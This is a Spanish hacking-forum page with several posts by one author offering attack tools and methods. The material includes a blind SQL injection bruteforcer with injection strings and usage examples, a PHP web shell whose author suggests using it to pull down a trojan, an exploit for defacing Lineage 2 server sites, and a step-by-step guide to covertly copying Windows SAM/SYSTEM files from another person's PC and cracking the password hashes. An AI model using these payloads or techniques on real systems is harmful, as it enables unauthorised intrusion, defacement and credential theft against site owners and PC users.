elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / Video: Jikto & Blindmap - Demonstration of attack en: 23 Agosto 2007, 03:41 am
Buenas,

Adjunto un enlace al video.
Sus opiniones aca.... lo siento si esta en ingles...

Video: http://codebreak.uni.cc/video/index.html

Consiste en un ataque basado en el reporte entregado por Jikto.
A partir de ahi, por medio de blindmap, aprovecharse de una inyección.



Saludos!!
2  Seguridad Informática / Nivel Web / BlindMap - Advanced SQL Injection en: 9 Junio 2007, 00:35 am
Hola,

Esta es una pequeña aplicación que hice el otro día.
Consiste en un bruteforcer automatizado para inyecciones ciegas (blind).  La idea principal de esta utilidad es la posibilidad de construir inyecciones SQL a gusto (sean ciegas o no) y utilizando el poder de la fuerza bruta. Se que hay una gran cantidad de utilidades para poder realizar inyecciones, sin embargo, la gran mayoría (o las que yo he visto) poseen inyecciones predeterminadas para obtener información especifica y no te dan la libertad de poder crear tus propias inyecciones con procesos automatizados.

Con esta utilidad, podrás crear tus propias inyecciones utilizando un incremento de char(n) para poder obtener información valiosa, incluso pudiendo utilizar diccionarios para poder forzar el nombre de tablas, columnas, etc...

La aplicacion:
Código:
   ______ _ _           ____  ___           
   | ___ \ (_)         | |  \/  |           
   | |_/ / |_ _ __   __| | .  . | __ _ _ __ 
   | ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
   | |_/ / | | | | | (_| | |  | | (_| | |_) |
   \____/|_|_|_| |_|\__,_\_|  |_/\__,_| .__/
                                      | |   
                                      |_| Rev.4

 ~ [ www.codebreak.tk - codebreak1984@gmail.com] ~
 
   Blind SQL Mapper - For advanced SQL Injection

Works with all mysql versions. Just desing a valid query.


Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984@gmail.com

-----------------------------------------------------------------------------
Usage: sql.exe -type host path injection check
type:
 -column      Will try to find valid columns using a wordlist.
 -brute       Will try to bruteforce your query.
 -table       Will bruteforce your query with a wordlist.
host:        target server (ip or hostname)
path:        vulnerable path, including script and variable
injection:   a valid mysql query.
 -[+]          the incremental MID variable, in case of a true query.
 -[char]       the incremental char numbers to compare the column data.
 -[word]       You can test words from a wordlist. Nice to find tables.
check:       A string shown in a valid query

Examples:

 sql.exe -brute "www.injectme.com" "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"

 sql.exe -column "www.injectme.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

 sql.exe -table "www.injectme.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

-----------------------------------------------------------------------------



Un ejemplo:
Supongamos que yo poseo un script con fallas y averiguo que existe una columna llamada "name", de modo que deseo obtener información dentro de dicha columna, asociada a mi consulta (id=404). Esta consulta debiese funcionar en MySQL 3.x

Código:
sql.exe -brute "localhost" "/system/search.php?search=404" "+AND+ASCII(MID(name,[+],1))=[char]" "404"

Donde:
Código:
- Host: localhost.
- Path (y consulta válida): "/system/search.php?search=404"
- Inyección: "+AND+ASCII(MID(name,[+],1))=[char]"
- columna: name
- Utilizando [+] y [char] para fuerza bruta. ("[+]" incrementa solo cuando se encuentra un "match" válido y "[char]" incrementa hasta un match válido).
- match: 404 (no es el ID, es un keyword en caso de resultado valido; 1=1).
* Ya se que lo que buscamos ya aparece en la web y la inyección es innecesaria, pero es para probar el concepto.

Lo anterior va a probar:
Código:
search.php?search=404+AND+ASCII(MID(name,1,1))=76
search.php?search=404+AND+ASCII(MID(name,1,1))=77  <--- MATCH VALIDO: 77 representa la letra M
search.php?search=404+AND+ASCII(MID(name,2,1))=32  <--- BUSCANDO SEGUNDA LETRA.
search.php?search=404+AND+ASCII(MID(name,2,1))=33
search.php?search=404+AND+ASCII(MID(name,2,1))=34
search.php?search=404+AND+ASCII(MID(name,2,1))=35

Resultado:



Otro ejemplo: mysql 3.x
Hagamos que conocemos otra inyección y ahora queremos conocer el nombre de la columna, utilizando esta consulta.

Código:
ORDER+BY+column--

De modo, que intentare esto:
Código:
sql.exe -column "www.somesite.com" "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

Donde:
- Host: ww.somesite.com
- Path (y consulta válida): ""/news/news.php?id=1"
- Match (encontrar): "Ps3 released!"
- Wordlist: "wordlist.txt"

Esto intentara:
Código:
news.php?id=1+ORDER+BY+user-
news.php?id=1+ORDER+BY+users--
news.php?id=1+ORDER+BY+pass--
news.php?id=1+ORDER+BY+password--
news.php?id=1+ORDER+BY+passwords--
*Cuando se encuentre un resultado válido (1=1), la aplicación listara el nombre de la columna.
** Esta es la unica consulta sin modificacion, esta pre diseñada. (de modo que puede fallar en ciertas apps, debido al diseño)


Otro ejemplo!: mysql 4.x
Encontramos otra inyección y ahora podemos utilizar UNIONES en las consultas, de modo que intentare averiguar el nombre de las tablas.

Intentare esto:
Código:
sql.exe -table "www.somesite.com" "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

Donde:
- Host: www.somesite.com
- Path & Inyección Valida (N° de columnas): "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]"
- Utilizando "[word]" como variable, donde estaran las palabras del diccionario.
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
* Cuando haya un resultado valido, la app nos dira la palabra valida.

Obviamente, estos son meramente ejemplos. Ustedes pueden diseñar sus propias consultas.
La idea principal de esta aplicación es poder tener una mano extra, que nos ayude cuando el proceso se vuelve tedioso y puede ser automatizado... porque como podran ver... no es una herramienta muy amigable y podriamos decir que es un poco avanzada.

Descarga:
http://rapidshare.com/files/30757746/sql.zip.html

Adios!
3  Seguridad Informática / Nivel Web / Server Explorer PHP Shell - Updated en: 5 Abril 2007, 03:46 am
Buenas,

He actualizado mi antigua shell (server explorer) por una algo mejor jaajaja.
Cree una shell desde cero e incluí la shell antigua (es decir, hay 2 interfaces de uso).

Lo nuevo:
- *Agregada la opcion de instalar Netcat.
- *Agregada la opcion de instalar wget.
- Incluye una simulación del comando "cat" de linux.
- Simulacion de shell (puedes navegar desde esta shell.. no solo ejecutar comandos, sino que explorar ya que recuerda los path).

* Las utilidades mencionadas, vienen incluidas en el código de la shell, de modo que no hay que descargarlas. Se instalan con un click.
Además, vienen codificadas en la base de la shell, de modo que si se instalan, la shell lo reconocera y habilitara los comandos "nc" y "wget" que estarán enganchados al sistema (se podrán ejecutar desde cualquier directorio, a lo linux). Es decir, puedes ingresar al disco "c:", luego a la carpeta "windows" y luego escribiendo "wger http://sitio.com/troyano.exe" podrás descargar un troyano directamente a ese directorio.



La shell:
http://rapidshare.com/files/24383052/cbreak.zip.html


Saludos,

PS: Ojala esta vez el personaje "MB" no me la plagie denuevo.
4  Seguridad Informática / Hacking / Hackeando webs de Lineage 2 - video en: 2 Enero 2007, 01:28 am
Esop, es un video-tutorial que muestra como "hackear" o defacear webs de Lineage 2, que usen servidores L2J.

La gran mayoría de los servidores de Lineage 2 L2J, ya sean tanto caseros como de comunidades, utilizan el portal "L2J Statistik Script".  Es mas, todos los packs listos (con apache + mysql + server l2j) incluyen dicha web.. asi que no es raro encontrar este tipo de webs en servers L2J.

Acá se muestra la ejecución del exploit para este tipo de webs.

El exploit lo pueden descargar desde aca:
http://rapidshare.com/files/5656195/cb.zip.html
http://rapidshare.com/files/5656403/cb-diskw.zip.html
(Siento mucho que sean .exe, pero el codigo fuente no es "publico" aun. Esto debido a que las ultimas 2 utilidades que hice, alguien cambio los creditos y lo subio a su sitio y otros sitios de seguridad a su nombre)



Saludos, ::)
5  Informática / Tutoriales - Documentación / Contraseñas admin en Windows XP/NT en: 30 Octubre 2004, 12:06 pm
Aquí un post que publique en otro lado... Tema conocido pero en fin, coloque otro metodo mas rápido.

----------------------------------------------

Como sacar contraseñas de administrador en Windows XP/NT

Windows XP/NT almacena las contraseñas de los usuarios y administradores en c:\windows\system32\config
Ahora, esos archivos contienen las llamadas "LM Hashes", las cuales obviamente están encriptadas. Estas hashes pueden ser crackeadas, pero primero tenemos que conseguirnos los archivos que las contienen y luego extraerlas.

Para extraerlas necesitamos por lo general de 2 archivos, el archivo "SAM" y el archivo "SYSTEM" (donde se almacena las claves SYSKEY; un potente código de cifrado). Ahora, extraer estos archivos no es tan simple como parece debido a que están protegidos, desde Windows no los podemos copiar ni editar. Entonces, como lo vamos a hacer:

Existen varios métodos, los mas conocidos son:
1) Extraerlas desde linux: Por lo general con Knoppix (linux que corre desde CD) debido a que no necesita instalarse. Además supongo que quieren hacerlo en un PC ajeno, así que no van a querer instalarle linux... obvio..

2) Otro método es desde DOS: Este método es mas rápido, pero requiere arreglar varios detalles.
A.-Cuando entras a "DOS" antes de iniciar Windows, con un disco de inicio por ejemplo, no vas a poder ver los archivos debido a que no soporta el sistema NTFS.
B.-A su vez, ya mencione que se necesita extraer el archivo "SYSTEM" el cual pesa demasiado (alcanza los 4/5 MB), entonces donde lo vamos a guardar?.....

La solución:
Con motivos de solucionar esto cree 2 discos, los cuales hacen lo siguiente:
El primero es un disco de inicio común, solo que posee la utilidad "NTFSDOS" la cual nos permite acceder al sistema que antes mencione a través de DOS.
El segundo es un disco que contiene 2 scripts en formato "bat". Una para copiar el archivo SYSTEM y la otra el archivo SAM al mismo disco. Ahora, a su vez los va a comprimir utilizando una utilidad llamada "GZIP".

Modo de uso: (Es rapidísimo)
1-Colocas el primer disco, esperas que cargue y escribes "ntfsdos" para que cargue dicha utilidad.
2-Colocas el segundo disco. Para robar el SAM escribes "steal1" y para robar el SYSTEM escribes "steal2". El resto lo hace solo. Mas fácil donde.....
3-Sacas los discos, reinicias el PC y nunca paso nada.

Crackeando los hashes:

Una vez que tengas ambos archivos, procedemos a crackearlos:
1-Para extraer los passwords cifrados vamos a necesitar el programa "SAMinside". Este programa nos va a pedir que abramos el archivo SAM (el cual va a estar comprimido dentro del disco 2), si el archivo SAM fue cifrado con SYSKEY, nos va a pedir a su vez que abramos el archivo SYSTEM (también el el disco 2).


2-Una vez que tenemos los user y sus pass encriptadas, lo exportamos como "pwdump".


3-Ahora abrimos el "LopthCrack" (LC5) e importamos el pwdump, después crackeamos (va a probar varios métodos, primero un diccionario "default" que trae y después por incremento de caracteres)



-THE END-
Por codebreak
[/B]
  8)



Utilidades:
-Disco 1
-Disco 2
-SAMinside
-LC5 (google)
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines